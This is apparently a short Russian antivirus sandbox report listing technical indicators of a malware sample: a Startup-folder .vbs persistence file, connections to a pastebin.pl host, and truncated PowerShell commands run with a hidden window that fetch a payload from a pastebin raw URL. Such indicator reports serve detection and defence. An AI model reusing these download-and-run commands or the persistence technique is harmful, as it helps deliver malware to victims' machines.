Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.vbs
- 'pa##ebin.pl':443
- 'pa##ebin.pl':443
- DNS ASK pa##ebin.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $http = [System.Net.HttpWebRequest]::Create('https://pastebin.pl/view/raw/5cd294ab'); $webres = $http.GetResponse(); $mem = $webres.GetResponseStream(); $sr = [IO.StreamReader]::new($mem); $dat...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $http = [System.Net.HttpWebRequest]::Create('https://pastebin.pl/view/raw/5cd294ab'); $webres = $http.GetResponse(); $mem = $webres.GetResponseStream(); $sr = [IO.StreamReader]::new($mem); $dat...